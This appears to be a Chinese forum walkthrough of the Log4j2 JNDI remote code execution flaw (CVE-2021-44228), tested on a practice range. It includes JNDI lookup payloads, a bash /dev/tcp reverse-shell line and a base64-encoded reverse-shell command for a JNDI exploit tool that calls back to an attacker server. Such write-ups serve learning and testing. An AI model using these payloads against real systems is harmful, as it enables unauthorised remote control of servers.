Log4j2远程代码执行漏洞(CVE-2021-44228)

漏洞描述

图片[1]-Log4j2远程代码执行漏洞(CVE-2021-44228)-山海云端论坛

Apache Log4j2是Apache软件基金会下的Java开源日志记录工具。Log4j2是对Log4j 1.x的重写,并引入了丰富的功能。广泛应用于业务系统开发,用于记录日志信息。该日志框架因其优异性能而在各种Web服务中得到广泛应用。

漏洞评级

Apache Log4j 远程代码执行漏洞:严重

图片[2]-Log4j2远程代码执行漏洞(CVE-2021-44228)-山海云端论坛

影响范围

  • Apache log4j2 2.* 到 Apache log4j2 2.15.1.rc1
  • 主流相关产品:
    • Spring-Boot-strater-log4j2
    • Apache Struts2
    • Apache Solr
    • Apache Flink
    • Apache Druid
    • ElasticSearch

Vuofocus 靶场测试

Vuofocus是一个供安全爱好者学习漏洞测试的平台。

Dnslog 出网测试

Dnslog是一个用于测试和验证域名解析情况的工具。

Payload 示例

使用GET方式提交payload:

  • payload=${jndi:ldap://X.X.X.X/exp}
  • payload=${jndi:ldap://5e0s0v.dnslog.cn/exp}

JNDI注入反弹shell

使用JNDI注入反弹shell,示例payload:

<code>bash -i >& /dev/tcp/ip/port 0>&1 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcCUuMjQuOTUuMi83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}" -A [vps ip]</code>

反弹shell命令进行了base64编码,可以参考此处获取更多payload。

成功利用漏洞

通过成功的JNDI注入反弹shell,攻击者可以获取目标系统的控制权。

注:请在合法授权和道德框架下使用漏洞测试工具,以遵守法律和道德准则。

© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容